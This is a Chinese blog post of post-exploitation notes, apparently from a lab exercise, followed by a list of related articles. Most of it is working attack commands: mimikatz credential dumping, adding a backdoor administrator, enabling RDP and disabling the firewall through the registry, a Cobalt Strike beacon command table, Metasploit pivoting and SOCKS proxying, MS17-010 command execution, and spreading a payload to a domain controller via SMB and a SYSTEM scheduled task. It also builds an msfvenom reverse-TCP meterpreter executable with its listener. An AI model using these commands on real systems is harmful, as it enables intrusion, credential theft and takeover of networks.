后渗透技巧-

最新推荐文章于 2023-08-07 20:37:15 发布
最新推荐文章于 2023-08-07 20:37:15 发布
阅读量333 收藏
点赞数
分类专栏: 渗透 文章标签: windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/giaogiao123/article/details/120572603
版权

查看域信息
net group /domain #查看域内所有用户列表
net group “domain computers” /domain #查看域成员计算机列表
net group “domain admins” /domain #查看域管理员用户

msf更新
apt-get update
apt-get install metasploit-framework
sudo gem install bundler
sudo gem update --system
sudo apt-get install libruby2.7 ruby2.7-dev ruby2.7
主机密码收集
logonpasswords
然后在凭据存储发现明文密码

利用蚁剑虚拟终端创建一个用户并将其加入到管理员组
添加用户:net user ddd 123456 /add
添加用户到管理员组:net localgroup Administrators ddd /add

查看端口被改
reg query “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /v portnumber
然后开启3389端口就可以通过3389端口远程控制目标机了
注册表开启3389端口
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
关闭防火墙
netsh firewall set opmode disable #winsows server 2003 之前
netsh advfirewall set allprofiles state off #winsows server 2003 之后

win+r 通过mstsc 远程桌面连接

BeaconCommands

Command Description

browserpivot 注入受害者浏览器进程
bypassuac 绕过UAC
cancel 取消正在进行的下载
cd 切换目录
checkin 强制让被控端回连一次
clear 清除beacon内部的任务队列
connect Connect to a Beacon peerover TCP
covertvpn 部署Covert VPN客户端
cp 复制文件
dcsync 从DC中提取密码哈希
desktop 远程VNC
dllinject 反射DLL注入进程
dllload 使用LoadLibrary将DLL加载到进程中
download 下载文件
downloads 列出正在进行的文件下载
drives 列出目标盘符
elevate 尝试提权
execute 在目标上执行程序(无输出)
execute-assembly 在目标上内存中执行本地.NET程序
exit 退出beacon
getprivs Enable system privileges oncurrent token
getsystem 尝试获取SYSTEM权限
getuid 获取用户ID
hashdump 转储密码哈希值
help 帮助
inject 在特定进程中生成会话
jobkill 杀死一个后台任务
jobs 列出后台任务
kerberos_ccache_use 从ccache文件中导入票据应用于此会话
kerberos_ticket_purge 清除当前会话的票据
kerberos_ticket_use 从ticket文件中导入票据应用于此会话
keylogger 键盘记录
kill 结束进程
link Connect to a Beacon peerover a named pipe
logonpasswords 使用mimikatz转储凭据和哈希值
ls 列出文件
make_token 创建令牌以传递凭据
mimikatz 运行mimikatz
mkdir 创建一个目录
mode dns 使用DNS A作为通信通道(仅限DNS beacon)
mode dns-txt 使用DNS TXT作为通信通道(仅限D beacon)
mode dns6 使用DNS AAAA作为通信通道(仅限DNS beacon)
mode http 使用HTTP作为通信通道
mv 移动文件
net net命令
note 备注
portscan 进行端口扫描
powerpick 通过Unmanaged PowerShell执行命令
powershell 通过powershell.exe执行命令
powershell-import 导入powershell脚本
ppid Set parent PID forspawned post-ex jobs
ps 显示进程列表
psexec Use a service to spawn asession on a host
psexec_psh Use PowerShell to spawn asession on a host
psinject 在特定进程中执行PowerShell命令
pth 使用Mimikatz进行传递哈希
pwd 当前目录位置
reg Query the registry
rev2self 恢复原始令牌
rm 删除文件或文件夹
rportfwd 端口转发
run 在目标上执行程序(返回输出)
runas 以另一个用户权限执行程序
runasadmin 在高权限下执行程序
runu Execute a program underanother PID
screenshot 屏幕截图
setenv 设置环境变量
shell cmd执行命令
shinject 将shellcode注入进程
shspawn 生成进程并将shellcode注入其中
sleep 设置睡眠延迟时间
socks 启动SOCKS4代理
socks stop 停止SOCKS4
spawn Spawn a session
spawnas Spawn a session as anotheruser
spawnto Set executable tospawn processes into
spawnu Spawn a session underanother PID
ssh 使用ssh连接远程主机
ssh-key 使用密钥连接远程主机
steal_token 从进程中窃取令牌
timestomp 将一个文件时间戳应用到另一个文件
unlink Disconnect from parentBeacon
upload 上传文件
wdigest 使用mimikatz转储明文凭据
winrm 使用WinRM在主机上生成会话
wmi 使用WMI在主机上生成会话
argue 进程参数欺骗

攻击msf配合cs
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.0.180
set lport 4444
exploit

添加路由
run post/multi/manage/autoroute
sysinfo 查看信息

靶机外网ip 192.168.0.107
两张网卡
内网ip 192.168.52.0/24网段有两台机子
现在需要把这个192.168.0.107当成跳板机渗透第二张网卡

设置代理
{
run autoroute
run autoroute -s
run post/multi/manage/autoroute
background
search socks_proxy
use 0
show options
set version 4a
run
}

jobs
route print (扫描内网ip段)
扫描内网机器
{
search nbname
use 0
show options
set rhosts 192.168.52.1-254
set threads 50
run
}
jobs
jobs -k 0
设置代理配置流量端口
{
search socks_proxy
use 0
set version 4a
show options
set srvport 1080
run
}

proxychains nmap -sT -Pn -T4 192.168.52.129

2008pc操作:
use auxiliary/admin/smb/ms17_010_command
show options
set rhosts 192.168.52.141
set command net user zlyhack zsjmzq123 /add #添加用户
run #成功执行
set command net localgroup administrators zlyhack /add #管理员权限
run #成功执行
set command ‘REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f’ //开启3389端口
run #成功执行

域控:
shell模式进入
chcp 65001换一下字体
net use \192.168.52.129\c$ “Zsjmzq@123” /user:“administrator”
dir \192.168.52.129\c$
将win7马共享给域控
copy c:\Windows\System32\shell.exe \192.168.52.129\c$

设置定时任务
schtasks /create /tn “test” /tr C:\shell.exe /sc once /st 22:14 /S 192.168.52.129 /RU System /u administrator /p “hongrisec@2019”

制作msf🐎
ip为in7ip端口一会监听时保存一致
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.52.128 lport=9999 -f exe -o shell.exe
设置

sessions -1
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost (win7ip)192.168.52.128
set lport 9999
run
监听端口获得shell
getuid确定域控

jing!
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
连接php3,xss漏洞,获取者shell
weixin_39654465的博客
03-10 1035
今日在github上看到暴露了一个xss漏洞,自己也经常使用。同时在freebuf上也有一篇文章,关于漏洞的。闲着没事测试了一波。一、漏洞成因shell远程连接失败时,会返回错误信息,但因为使用的是html解析,导致xss漏洞。用过的童靴都清楚,当我们远程连接写好的webshell的时候,有时候可能因为shell书写错误或者链接填写不当的时候,会出现大堆的错误代码。该信息并...
红队学习笔记--->Day1
最新发布
huohaowen的博客
02-08 1614
而我的朋友,内网!!!!!才是真正的战场!!!!!!!!!!!!!!!!!
Cobalt Strike使用+Meterpreter使用
NSQ0207的博客
08-07 272
Cobalt Strike使用。
一次内网渗透测试实验过程
渗透测试研究中心
01-24 581
0x01 渗透测试过程通过渗透网站拿到webshell,然后通过webshell拿到网站主机系统权限,发现受害主机有两张网卡,另一张网卡下有两台存活的内网主机,然后我们就尝试渗透存活的内网主机看能不能拿到系统权限,最后发现两台内网主机都开启了445端口,然后搜索了一下445端口漏洞发现有个最新的m17_010可能可以利用,结果真的通过ms17_010成功获得了内网主机的权限。 目标网站ip:19...
内网安全-记一次内网靶机渗透
kali_Ma的博客
02-24 5946
所涉及到的知识点: 1、WEB安全-漏洞发现及利用 2、系统安全-权限提升(漏洞&配置&逃逸) 3、内网安全-横向移动(口令传递&系统漏洞) 实战演练-ATT&CK实战系列-红队评估 环境下载: http://vulnstack.qiyuanxuetang.net/vuln/detail/9/ 利用资源: https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP https://github.com/briskets
[HACK学习呀] - 2020-11-13 渗透技巧-Hadoop命令执行1
08-03
3.更多细节:hadoop job -history all output-dir 4.杀死任务 5.使任务失败 1.申请新的application,直接通过c
内网渗透技巧
05-31
内网渗透技巧思路篇,懂得安全的小伙伴可以下载看看。
渗透完全技巧.pdf
10-03
1.无凭证情况下 网络扫描 漏洞快速探测 提权 拥有本地管理员权限 获取密码 绕过LSA防护策略读取密码 token窃取 查看本地存储的所有密码 卷影拷贝(获取域控所有hash) dpapi解密 ...CVE-2021-42278 && CVE-2021-42287
Pentest-Hints:渗透测试技巧
05-03
渗透测试提示 渗透测试技巧
087-express框架一些渗透技巧.pdf
09-20
087-express框架一些渗透技巧.pdf
工具-01】网站管理工具之中国安装过程详解以及应用实例
m0_64378913的博客
06-18 6712
目录1 中国安装及设置1.1 下载1.2 安装1.3 相关设置2 中国应用实例2.1 操作环境2.2 具体步骤2.3 思考3 总结参考文章 任何人不得将其用于非法用途以及盈利等目的,也禁止未经允许私自修改打包进行发布,否则后果自行承担并将追究其相关责任! 中国是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。 1 中国安装及设置 安装位置:win10真实机 1.1 下载 (1)下载加载器。在官方github下载,网址为https://
验证内网渗透添加默认路由
orange777
02-23 1752
内网渗透中,如果存在访问不到其它内网主机,而肉鸡又存在双网卡或者多网卡情况,就要考虑在msf中添加静态路由,如下图: 在攻击者A不能直接访问服务器C,但是在拿下内网主机B后,可以通过添加静态路由,借助主机B作为跳板,对服务器C做进一步的渗透 可以通过msfvenom制作一个木马,是肉鸡上线,这里我已经做好了 msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.111.3 lport=8888 -f exe >shell.exe
论后渗透MSF之 | 添加路由和代理
一醉一休的博客
09-08 6583
内网中添加路由主要是`充当跳板`功能, 其实是MSF框架中自带的一个路由转发功能,其实现过程就是MSF框架在已经获取的meterpreter shell的基础上`添加一条去往内网的路由`,此路由的下一跳转发,即网关,是MSF攻击平台与被攻击目标建立的一个session会话
【安全研究】Linux后渗透常见后门驻留方式分析
weixin_49128886的博客
11-09 1328
Linux后渗透常见后门驻留方式分析
实战 | 手把手教你如何进行内网渗透
jennycisp的博客
06-25 1848
内网渗透主要是基于前期外围打点getshell的webserver,通过收集webserver上的信息,然后对其他内网主机进行口令上的攻击,当然也有一些基于漏洞的攻击。内网相关概念这里不再进行介绍,大家可以自行百度,诸如什么是域、域与工作组的区别、什么是DC、什么是AD等。当然,概念是生涩难懂的,结合实际环境会有助于理解。某内网靶场的详细教程:Vulnstack(一)内网渗透过程中经常会涉及到内网穿透,如何理解内网穿透以及端口转发、端口映射等相关知识可以参考:如何从零构建对内网穿透的理解。
红日靶场vulnstack1 内网渗透学习
snowlyzz的博客
09-18 2117
红日靶场渗透教程
【原创】内网穿透案例
小王的技术库
07-25 369
web端exp打入第一个服务器,上线msf,添加路由,代理等扫描第二个服务器的web网站,浏览器开启代理访问第二个服务器的网站,打入exp,通过正向连接上线msf(因为msf虽然为76网段,但可以通过代理以22网段访问第二个服务器,而第二个服务器则不可以访问76网段),继续添加33网段的路由,如果有web端则再。
利用ms16-032提权并打开3389端口
qq_45405155的博客
12-27 1327
利用ms16-032提权并打开3389端口 1、在VM中创建win 2003,在win2003上安装iis服务并开启服务 2、配置iis服务 3、上传源码及配置网站 给put文件设置权限,添加iis访问权限 设置默认访问页面 index.asp 访问192.168.x.x 4、修改checksql文件进行sql注入 判断注入点 http://192.168.8.130/shownews.asp?id=275 and 1=1 http://192.168.8.130/shownews.asp?id=2
渗透(二)-内网隧道与端口转发技术
黑白的博客
05-01 5239
对于我们的环境而言,kali是桥接,首先只能访问桥接的win2016和centos7-2,所以我们跟kali通信的大多是使用win2016的,这里毕竟是模拟环境,我们就会假设win2016这台windows已经被拿下了,所以很多木马都是直接放到win2016上的,这些操作跟域相关的知识关系还不是很大,基本都是拿下第一台服务器后的一些操作,所以用到kali和win2016比较多,我们的环境是建立在vmware的三种网络模式上,去模拟各种环境。
渗透测试基础学习流程与技巧
05-15
渗透测试是一种评估计算机系统、网络或应用程序安全的方法。其基本流程包括: 1. 信息收集:收集目标的信息,如域名、IP地址、端口、操作系统、应用程序等。 2. 漏洞扫描:使用自动化工具扫描目标系统,寻找可能存在的漏洞。 3. 渗透攻击:使用漏洞进行攻击,获取权限或敏感信息。 4. 维持访问:在目标系统内部安装后门或其他攻击工具,以便随时访问系统。 5. 清理痕迹:清除攻击留下的痕迹,以避免被发现。 以下是一些渗透测试的技巧: 1. 掌握常用的漏洞扫描工具,如Nmap、OpenVAS、Nessus等。 2. 熟悉常见的漏洞类型,如SQL注入、跨站脚本攻击、文件包含漏洞等。 3. 善于分析漏洞扫描结果,了解漏洞的风险等级和修复方案。 4. 掌握常见的攻击技术,如社会工程学攻击、漏洞利用、后门等。 5. 学会使用脚本编程语言,如Python、Perl等,编写自己的攻击工具。 6. 善于使用搜索引擎和开源情报工具,如Shodan、FOFA等,获取目标信息。 7. 关注安全漏洞信息和安全社区,不断学习新的攻击技术和防御策略。 8. 在进行渗透测试时,一定要遵守法律和道德规范,不得侵犯他人的隐私和财产安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值